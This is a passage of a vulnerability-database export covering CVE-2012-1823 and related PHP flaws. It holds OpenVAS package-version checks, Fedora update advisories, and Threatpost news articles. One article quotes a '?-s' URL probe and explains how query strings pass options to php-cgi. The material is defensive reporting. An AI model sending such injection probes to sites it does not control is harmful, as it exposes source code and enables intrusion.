script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"php on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.4~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-03T10:58:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-2386", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2329"], "description": "Check for the Version of php", "modified": "2018-01-03T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864517", "href": "http://plugins.openvas.org/nasl.php?oid=864517", "type": "openvas", "title": "Fedora Update for php FEDORA-2012-9490", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2012-9490\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated web pages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\n\ntag_affected = \"php on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/083318.html\");\n script_id(864517);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:24:06 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-2329\", \"CVE-2012-1823\", \"CVE-2012-2143\", \"CVE-2012-2386\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9490\");\n script_name(\"Fedora Update for php FEDORA-2012-9490\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.4~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:07:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-2386", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2688", "CVE-2012-2329"], "description": "Check for the Version of php", "modified": "2018-01-17T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864590", "href": "http://plugins.openvas.org/nasl.php?oid=864590", "type": "openvas", "title": "Fedora Update for php FEDORA-2012-10936", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2012-10936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated web pages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\n\ntag_affected = \"php on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084668.html\");\n script_id(864590);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:20:32 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2688\", \"CVE-2012-2143\", \"CVE-2012-2386\", \"CVE-2012-2311\",\n \"CVE-2012-2329\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-10936\");\n script_name(\"Fedora Update for php FEDORA-2012-10936\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.5~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-2386", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2688", "CVE-2012-2329"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864590", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864590", "type": "openvas", "title": "Fedora Update for php FEDORA-2012-10936", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2012-10936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084668.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864590\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:20:32 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2688\", \"CVE-2012-2143\", \"CVE-2012-2386\", \"CVE-2012-2311\",\n \"CVE-2012-2329\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-10936\");\n script_name(\"Fedora Update for php FEDORA-2012-10936\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"php on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.5~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-2386", "CVE-2012-1823", "CVE-2012-2143"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-03T00:00:00", "id": "OPENVAS:1361412562310864523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864523", "type": "openvas", "title": "Fedora Update for php FEDORA-2012-9762", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2012-9762\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-July/083375.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864523\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-03 10:24:31 +0530 (Tue, 03 Jul 2012)\");\n script_cve_id(\"CVE-2012-2143\", \"CVE-2012-2386\", \"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9762\");\n script_name(\"Fedora Update for php FEDORA-2012-9762\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"php on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.14~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2329", "CVE-2012-2386", "CVE-2013-1635", "CVE-2013-1643"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2013-04-03T04:38:44", "published": "2013-04-03T04:38:44", "id": "FEDORA:0838320B29", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: php-5.4.13-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2329", "CVE-2012-2386", "CVE-2013-1635", "CVE-2013-1643"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2013-06-23T05:58:52", "published": "2013-06-23T05:58:52", "id": "FEDORA:6EE0A21254", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: php-5.4.16-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2329", "CVE-2012-2386", "CVE-2013-1635", "CVE-2013-1643", "CVE-2013-4113"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2013-07-23T01:17:30", "published": "2013-07-23T01:17:30", "id": "FEDORA:695182240A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: php-5.4.17-2.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2329", "CVE-2012-2386"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-06-30T22:07:21", "published": "2012-06-30T22:07:21", "id": "FEDORA:2FE26212BB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: php-5.4.4-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2329", "CVE-2012-2386", "CVE-2012-2688"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-08-05T21:27:45", "published": "2012-08-05T21:27:45", "id": "FEDORA:4059D217E2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: php-5.4.5-1.fc17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2386"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-07-02T22:31:44", "published": "2012-07-02T22:31:44", "id": "FEDORA:42AD9212FB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-5.3.14-1.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2386", "CVE-2012-2688"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-08-05T21:22:14", "published": "2012-08-05T21:22:14", "id": "FEDORA:8819720FCC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-5.3.15-1.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311", "CVE-2012-2329"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-05-26T07:21:09", "published": "2012-05-26T07:21:09", "id": "FEDORA:9729C2155E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: php-5.4.3-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311", "CVE-2012-2329"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2012-05-26T07:21:09", "published": "2012-05-26T07:21:09", "id": "FEDORA:A07AD21BF1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: maniadrive-1.2-40.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2143", "CVE-2012-2386"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2012-06-30T22:07:21", "published": "2012-06-30T22:07:21", "id": "FEDORA:38CAF2140B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: maniadrive-1.2-41.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T23:03:06", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823", "CVE-2012-1863", "CVE-2012-2311", "CVE-2012-2329"], "description": "For the second time in less than a week, the developers of PHP have released new versions of the language that include a fix for the remotely exploitable vulnerability that was disclosed last week. The group is encouraging users to upgrade to PHP 5.4.3 or 5.3.13 immediately. \n\nThe [vulnerability affects PHP](<https://threatpost.com/another-set-php-releases-pushed-out-fix-cve-2012-1823-flaw-050912/>) sites in CGI-based setups and can enable an attacker to get access to the site\u2019s source code by passing certain queries to the PHP binary as command-line arguments. The bug was disclosed last week before a patch was available through a mistake in the PHP Group\u2019s internal bug-handling system.\n\n\u201cThe PHP development team would like to announce the immediate availability of PHP 5.4.3 and PHP 5.3.13. All users are encouraged to upgrade to PHP 5.4.3 or PHP 5.3.13\n\nThe releases complete a fix for a [vulnerability](<http://www.php.net/archive/2012.php#id2012-05-03-1>) in CGI-based setups (CVE-2012-2311). _Note: mod_php and php-fpm are not vulnerable to this attack,\u201d _the PHP developers said.\n\n\u201cPHP 5.4.3 fixes a buffer overflow vulnerability in the [apache_request_headers()](<http://php.net/manual/function.apache-request-headers.php>) (CVE-2012-2329). The PHP 5.3 series is not vulnerable to this issue.\u201d\n\nThe PHP Group [released a fix for the bug](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>) late last week, but the researchers who discovered the flaw originally found that the new versions didn\u2019t completely address the problem and still left vulnerable sites exposed to attack. There are mitigations available for the bug, as explained by the [Eindbazen](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>) team that found the flaw, but users should upgrade their installations as soon as they can.\n", "modified": "2013-04-17T16:32:16", "published": "2012-05-09T14:32:23", "id": "THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5", "href": "https://threatpost.com/another-set-php-releases-pushed-out-fix-cve-2012-1823-flaw-050912/76544/", "type": "threatpost", "title": "Another Set of PHP Releases Pushed Out to Fix CVE-2012-1823 Flaw", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:08", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823", "CVE-2012-1863", "CVE-2012-2311"], "description": "**UPDATE**\u2013The developers of PHP have released new versions of the scripting language to fix a [remotely exploitable vulnerability](<https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/>) announced earlier this week that enables an attacker to pass command-line arguments to the PHP binary. The flaw has been in the code for more than eight years and The PHP Group was working on a patch for it when the bug was disclosed accidentally on Reddit. However, the team that found the bug says the new versions of PHP don\u2019t actually fix the vulnerability. \n\nThe new versions of PHP are available now and the developers recommend that users upgrade as soon as possible. PHP versions 5.3.12 and 5.4.2 both contain the fix for the vulnerability. \n\n\u201cWe\u2019ve tested this and have confirmed that the query parameters are passed to the php5-cgi binary in this configuration. Since the wrapper script merely passes all the arguments on to the actual php-cgi binary, the same problem exists with configurations where php-cgi is directly copied into the cgi-bin directory. It\u2019s interesting to note that while slashes get added to any shell metacharacters we pass in the query string, spaces and dashes (\u2018-\u2019) are not escaped. So we can pass as many options to PHP as we want!\u201d the team that discovered the flaw, known as [Eindbazen](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>), wrote in their analysis of the bug. \n\nEindbazen said in an updated post that the PHP patch isn\u2019t sufficient to fix the bug.\n\n\u201cThe new PHP release is buggy. You can use their mitigation mod_rewrite rule, but the patch and new released versions do not fix the problem. At the bottom we have added a version of the PHP patch that fixes the obvious problem with the patch merged in the recently released security update,\u201d the team said. \n\nThe PHP Group is working on a new fix for the vulnerability now.\n\n\u201cWe have received word that new PHP updates with the revised fix will be released soon. The issue that this problem was not properly fixed by the original security update is being tracked as CVE-2012-2311,\u201d Eindbazen said.\n\nThe PHP Group also had some other problems this week, specifically a problem in its internal bug-handling system that resulted in the private discussion on the CVE-2012-1823 vulnerability being marked as public. That led to the bug being posted to Reddit. The Eindbazen team then posted the details of the bug, which they had discovered in January during a capture the flag contest.\n\n\u201cThere is a vulnerability in certain CGI-based setups **(Apache+mod_php and nginx+php-fpm are not affected)** that has gone unnoticed for at least 8 years. [Section 7 of the CGI spec](<http://tools.ietf.org/html/draft-robinson-www-interface-00#section-7>) states:\n\nSome systems support a method for supplying a [sic] array of strings to the CGI script. This is only used in the case of an `indexed\u2019 query. This is identified by a \u201cGET\u201d or \u201cHEAD\u201d HTTP request with a URL search string not containing any unencoded \u201c=\u201d characters.\n\nSo, requests that do not have a \u201c=\u201d in the query string are treated differently from those who do in some CGI implementations. For PHP this means that a request containing ?-s may dump the PHP source code for the page, but a request that has ?-s&=1 is fine.\n\nA large number of sites run PHP as either an Apache module through mod_php or using php-fpm under nginx. Neither of these setups are vulnerable to this. Straight shebang-style CGI also does not appear to be vulnerable,\u201d the [PHP Group](<http://www.php.net/archive/2012.php#id2012-05-03-1>) said in its release notes for the new versions. \u201cIf you are using Apache mod_cgi to run PHP you may be vulnerable. To see if you are, just add ?-s to the end of any of your URLs. If you see your source code, you are vulnerable. If your site renders normally, you are not.\n\nThe PHP developers said that while the new versions of the language should work for most users, it may not be feasible for some users to update much older versions of PHP. In that case, users can deploy a workaround.\n\n\u201cAn alternative is to configure your web server to not let these types of requests with query strings starting with a \u201c-\u201d and not containing a \u201c=\u201d through. Adding a rule like this should not break any sites,\u201d they said.\n", "modified": "2013-04-17T16:32:18", "published": "2012-05-04T14:26:46", "id": "THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "href": "https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/76524/", "type": "threatpost", "title": "PHP Group Releases New Versions, But Patch Doesn't Fix CVE-2012-1823 Bug", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:09", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "[![PHP patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065632/php_patch_0.jpg)](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>)The PHP Group on Tuesday is planning to release another new version of the scripting language that\u2019s designed to address, again, the [remotely exploitable flaw](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>) that came to light last week. That bug, which requires no authentication, was supposed to have been fixed in new releases pushed out on May 3, but they didn\u2019t completely address the problem.\n\nAfter The [PHP Group released new versions](<https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/>) of the language, the research team that initially discovered the flaw 